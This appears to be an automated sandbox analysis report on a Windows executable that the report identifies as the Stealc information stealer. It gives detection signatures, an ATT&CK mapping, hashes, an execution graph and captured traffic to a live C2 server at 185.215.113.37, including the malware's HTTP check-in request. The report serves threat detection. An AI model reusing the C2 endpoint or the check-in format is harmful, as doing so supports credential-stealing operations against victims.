Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_00ED9600
Source: file.exe, file.exe, 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: bAProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_00ED7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, | 0_2_00ED7980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00ED7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, | 0_2_00ED7A30

                Stealing of Sensitive Information

                Source: Yara match; File source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
                Source: Yara match; File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match; File source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
                Source: Yara match; File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (tactic: techniques, with the report's per-technique figures kept in front of the technique name)

                • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                • Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                • Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                • Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                • Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                • Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
                • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                • Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                • Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpn | file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php= | file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpR | file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php) | file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/K | file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37D | file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                              IP | Domain | Country | ASN | ASN Name | Malicious
                              185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1525234
                              Start date and time:2024-10-03 22:50:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 0s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of new started processes analysed:1
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 81%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 83
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                              No context
                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                              WHOLESALECONNECTIONSNL | Setup.exe | malicious | RedLine | 185.215.113.22
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.9516214099603015
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'864'704 bytes
                              MD5:67ba8a4a441b8c1e892ab227cc5f142a
                              SHA1:5cf0a0706a9db5ec122d52576479f62327a655b1
                              SHA256:12db50d8781fb72163f2cc3eb674b94558050eb9e965c02ea8936ed1770ca298
                              SHA512:378c6fdd99b64c84c677c8873041aa74892d2fc818dc75b2c4bdbabc308f8e5301994593b414eaf82669e2484f6ca9d4c1d2763ba7c7b27121c20a7c6d0afa09
                              SSDEEP:49152:dFAjgmHKOnCX2JuUjipfS4kKjlQqjzv3aE:dhSc2JFOc49lQwzv3a
                              TLSH:398533ED37306367E670AF34A0A65224E36B33B80476CDD71C4D6BD12AAB541E35A13E
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                              Icon Hash:90cececece8e8eb0
                              Entrypoint:0xaa6000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               | 0x1000 | 0x25b000 | 0x22800 | 4d250e44f6f87b36cfe5b03907266dfd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               | 0x25e000 | 0x2a5000 | 0x200 | e836c6861f967166d901e295b3d3e541 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              qtygkfie | 0x503000 | 0x1a2000 | 0x1a1200 | 4b65d9003beaa126788eea9110fc21e7 | False | 0.9948816067950255 | data | 7.952733470198543 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              bnphghxp | 0x6a5000 | 0x1000 | 0x400 | 6cd0bbb0da55e76047bcb92e32038ebe | False | 0.798828125 | data | 6.2625656757416746 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant | 0x6a6000 | 0x3000 | 0x2200 | 9edef57b29f6477ff9317880496df6c7 | False | 0.39636948529411764 | DOS executable (COM) | 4.247893399963463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              DLL | Import
                              kernel32.dll | lstrcpy
                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                              2024-10-03T22:50:59.767145+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Oct 3, 2024 22:50:58.696605921 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              Oct 3, 2024 22:50:58.701730013 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                              Oct 3, 2024 22:50:58.701814890 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              Oct 3, 2024 22:50:58.702001095 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              Oct 3, 2024 22:50:58.706903934 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                              Oct 3, 2024 22:50:59.405735016 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                              Oct 3, 2024 22:50:59.405826092 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              Oct 3, 2024 22:50:59.533067942 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              Oct 3, 2024 22:50:59.538088083 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                              Oct 3, 2024 22:50:59.766988993 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                              Oct 3, 2024 22:50:59.767144918 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              Oct 3, 2024 22:51:03.398195028 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              • 185.215.113.37
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6952 | C:\Users\user\Desktop\file.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Oct 3, 2024 22:50:58.702001095 CEST | 89 | OUT | GET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 3, 2024 22:50:59.405735016 CEST | 203 | IN | HTTP/1.1 200 OK
                              Date: Thu, 03 Oct 2024 20:50:59 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 3, 2024 22:50:59.533067942 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 41 33 41 41 46 35 45 32 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a
                              Data Ascii (CRLF line breaks from the raw bytes restored):
                              ------GCGHJEBGHJKEBFHIJDHC
                              Content-Disposition: form-data; name="hwid"

                              40A3AAF5E2363848468766
                              ------GCGHJEBGHJKEBFHIJDHC
                              Content-Disposition: form-data; name="build"

                              doma
                              ------GCGHJEBGHJKEBFHIJDHC--
                              Oct 3, 2024 22:50:59.766988993 CEST | 210 | IN | HTTP/1.1 200 OK
                              Date: Thu, 03 Oct 2024 20:50:59 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=



                              Target ID:0
                              Start time:16:50:56
                              Start date:03/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xec0000
                              File size:1'864'704 bytes
                              MD5 hash:67BA8A4A441B8C1E892AB227CC5F142A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:8.1%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
13399->13402 13400 ed69d8 ExitProcess 13401->13399 13401->13400 13403 ed5b1d 13402->13403 13404 eda740 lstrcpy 13403->13404 13405 ed5b2e 13404->13405 13638 eda820 lstrlen 13405->13638 13408 eda820 2 API calls 13409 ed5b64 13408->13409 13410 eda820 2 API calls 13409->13410 13411 ed5b74 13410->13411 13642 ed6430 13411->13642 13414 eda820 2 API calls 13415 ed5b93 13414->13415 13416 eda820 2 API calls 13415->13416 13417 ed5ba0 13416->13417 13418 eda820 2 API calls 13417->13418 13419 ed5bad 13418->13419 13420 eda820 2 API calls 13419->13420 13421 ed5bf9 13420->13421 13651 ec26a0 13421->13651 13429 ed5cc3 13430 ed6430 lstrcpy 13429->13430 13431 ed5cd5 13430->13431 13432 eda7a0 lstrcpy 13431->13432 13433 ed5cf2 13432->13433 13434 eda9b0 4 API calls 13433->13434 13435 ed5d0a 13434->13435 13436 eda8a0 lstrcpy 13435->13436 13437 ed5d16 13436->13437 13438 eda9b0 4 API calls 13437->13438 13439 ed5d3a 13438->13439 13440 eda8a0 lstrcpy 13439->13440 13441 ed5d46 13440->13441 13442 eda9b0 4 API calls 13441->13442 13443 ed5d6a 13442->13443 13444 eda8a0 lstrcpy 13443->13444 13445 ed5d76 13444->13445 13446 eda740 lstrcpy 13445->13446 13447 ed5d9e 13446->13447 14377 ed7500 GetWindowsDirectoryA 13447->14377 13450 eda7a0 lstrcpy 13451 ed5db8 13450->13451 14387 ec4880 13451->14387 13453 ed5dbe 14532 ed17a0 13453->14532 13455 ed5dc6 13456 eda740 lstrcpy 13455->13456 13457 ed5de9 13456->13457 13458 ec1590 lstrcpy 13457->13458 13459 ed5dfd 13458->13459 14548 ec5960 13459->14548 13461 ed5e03 14692 ed1050 13461->14692 13463 ed5e0e 13464 eda740 lstrcpy 13463->13464 13465 ed5e32 13464->13465 13466 ec1590 lstrcpy 13465->13466 13467 ed5e46 13466->13467 13468 ec5960 34 API calls 13467->13468 13469 ed5e4c 13468->13469 14696 ed0d90 13469->14696 13471 ed5e57 13472 eda740 lstrcpy 13471->13472 13473 ed5e79 13472->13473 13474 ec1590 lstrcpy 13473->13474 13475 ed5e8d 13474->13475 13476 ec5960 34 API calls 13475->13476 13477 ed5e93 13476->13477 14703 ed0f40 13477->14703 13479 ed5e9e 13480 ec1590 lstrcpy 
13479->13480 13481 ed5eb5 13480->13481 14708 ed1a10 13481->14708 13483 ed5eba 13484 eda740 lstrcpy 13483->13484 13485 ed5ed6 13484->13485 15052 ec4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13485->15052 13487 ed5edb 13488 ec1590 lstrcpy 13487->13488 13489 ed5f5b 13488->13489 15059 ed0740 13489->15059 13491 ed5f60 13492 eda740 lstrcpy 13491->13492 13493 ed5f86 13492->13493 13494 ec1590 lstrcpy 13493->13494 13495 ed5f9a 13494->13495 13496 ec5960 34 API calls 13495->13496 13497 ed5fa0 13496->13497 13591 ec45d1 RtlAllocateHeap 13590->13591 13594 ec4621 VirtualProtect 13591->13594 13594->13239 13595->13326 13597 ec10c2 codecvt 13596->13597 13598 ec10fd 13597->13598 13599 ec10e2 VirtualFree 13597->13599 13598->13356 13599->13598 13601 ec1233 GlobalMemoryStatusEx 13600->13601 13601->13359 13602->13383 13604 eda7c2 13603->13604 13605 eda7ec 13604->13605 13606 eda7da lstrcpy 13604->13606 13605->13388 13606->13605 13608 eda740 lstrcpy 13607->13608 13609 ed6833 13608->13609 13610 eda9b0 4 API calls 13609->13610 13611 ed6845 13610->13611 13612 eda8a0 lstrcpy 13611->13612 13613 ed684e 13612->13613 13614 eda9b0 4 API calls 13613->13614 13615 ed6867 13614->13615 13616 eda8a0 lstrcpy 13615->13616 13617 ed6870 13616->13617 13618 eda9b0 4 API calls 13617->13618 13619 ed688a 13618->13619 13620 eda8a0 lstrcpy 13619->13620 13621 ed6893 13620->13621 13622 eda9b0 4 API calls 13621->13622 13623 ed68ac 13622->13623 13624 eda8a0 lstrcpy 13623->13624 13625 ed68b5 13624->13625 13626 eda9b0 4 API calls 13625->13626 13627 ed68cf 13626->13627 13628 eda8a0 lstrcpy 13627->13628 13629 ed68d8 13628->13629 13630 eda9b0 4 API calls 13629->13630 13631 ed68f3 13630->13631 13632 eda8a0 lstrcpy 13631->13632 13633 ed68fc 13632->13633 13634 eda7a0 lstrcpy 13633->13634 13635 ed6910 13634->13635 13635->13395 13637 eda812 13636->13637 13637->13398 13639 eda83f 13638->13639 13640 ed5b54 13639->13640 13641 eda87b lstrcpy 13639->13641 13640->13408 13641->13640 13643 eda8a0 lstrcpy 13642->13643 13644 ed6443 
13643->13644 13645 eda8a0 lstrcpy 13644->13645 13646 ed6455 13645->13646 13647 eda8a0 lstrcpy 13646->13647 13648 ed6467 13647->13648 13649 eda8a0 lstrcpy 13648->13649 13650 ed5b86 13649->13650 13650->13414 13652 ec45c0 2 API calls 13651->13652 13653 ec26b4 13652->13653 13654 ec45c0 2 API calls 13653->13654 13655 ec26d7 13654->13655 13656 ec45c0 2 API calls 13655->13656 13657 ec26f0 13656->13657 13658 ec45c0 2 API calls 13657->13658 13659 ec2709 13658->13659 13660 ec45c0 2 API calls 13659->13660 13661 ec2736 13660->13661 13662 ec45c0 2 API calls 13661->13662 13663 ec274f 13662->13663 13664 ec45c0 2 API calls 13663->13664 13665 ec2768 13664->13665 13666 ec45c0 2 API calls 13665->13666 13667 ec2795 13666->13667 13668 ec45c0 2 API calls 13667->13668 13669 ec27ae 13668->13669 13670 ec45c0 2 API calls 13669->13670 13671 ec27c7 13670->13671 13672 ec45c0 2 API calls 13671->13672 13673 ec27e0 13672->13673 13674 ec45c0 2 API calls 13673->13674 13675 ec27f9 13674->13675 13676 ec45c0 2 API calls 13675->13676 13677 ec2812 13676->13677 13678 ec45c0 2 API calls 13677->13678 13679 ec282b 13678->13679 13680 ec45c0 2 API calls 13679->13680 13681 ec2844 13680->13681 13682 ec45c0 2 API calls 13681->13682 13683 ec285d 13682->13683 13684 ec45c0 2 API calls 13683->13684 13685 ec2876 13684->13685 13686 ec45c0 2 API calls 13685->13686 13687 ec288f 13686->13687 13688 ec45c0 2 API calls 13687->13688 13689 ec28a8 13688->13689 13690 ec45c0 2 API calls 13689->13690 13691 ec28c1 13690->13691 13692 ec45c0 2 API calls 13691->13692 13693 ec28da 13692->13693 13694 ec45c0 2 API calls 13693->13694 13695 ec28f3 13694->13695 13696 ec45c0 2 API calls 13695->13696 13697 ec290c 13696->13697 13698 ec45c0 2 API calls 13697->13698 13699 ec2925 13698->13699 13700 ec45c0 2 API calls 13699->13700 13701 ec293e 13700->13701 13702 ec45c0 2 API calls 13701->13702 13703 ec2957 13702->13703 13704 ec45c0 2 API calls 13703->13704 13705 ec2970 13704->13705 13706 ec45c0 2 API calls 13705->13706 13707 ec2989 13706->13707 
13708 ec45c0 2 API calls 13707->13708 13709 ec29a2 13708->13709 13710 ec45c0 2 API calls 13709->13710 13711 ec29bb 13710->13711 13712 ec45c0 2 API calls 13711->13712 13713 ec29d4 13712->13713 13714 ec45c0 2 API calls 13713->13714 13715 ec29ed 13714->13715 13716 ec45c0 2 API calls 13715->13716 13717 ec2a06 13716->13717 13718 ec45c0 2 API calls 13717->13718 13719 ec2a1f 13718->13719 13720 ec45c0 2 API calls 13719->13720 13721 ec2a38 13720->13721 13722 ec45c0 2 API calls 13721->13722 13723 ec2a51 13722->13723 13724 ec45c0 2 API calls 13723->13724 13725 ec2a6a 13724->13725 13726 ec45c0 2 API calls 13725->13726 13727 ec2a83 13726->13727 13728 ec45c0 2 API calls 13727->13728 13729 ec2a9c 13728->13729 13730 ec45c0 2 API calls 13729->13730 13731 ec2ab5 13730->13731 13732 ec45c0 2 API calls 13731->13732 13733 ec2ace 13732->13733 13734 ec45c0 2 API calls 13733->13734 13735 ec2ae7 13734->13735 13736 ec45c0 2 API calls 13735->13736 13737 ec2b00 13736->13737 13738 ec45c0 2 API calls 13737->13738 13739 ec2b19 13738->13739 13740 ec45c0 2 API calls 13739->13740 13741 ec2b32 13740->13741 13742 ec45c0 2 API calls 13741->13742 13743 ec2b4b 13742->13743 13744 ec45c0 2 API calls 13743->13744 13745 ec2b64 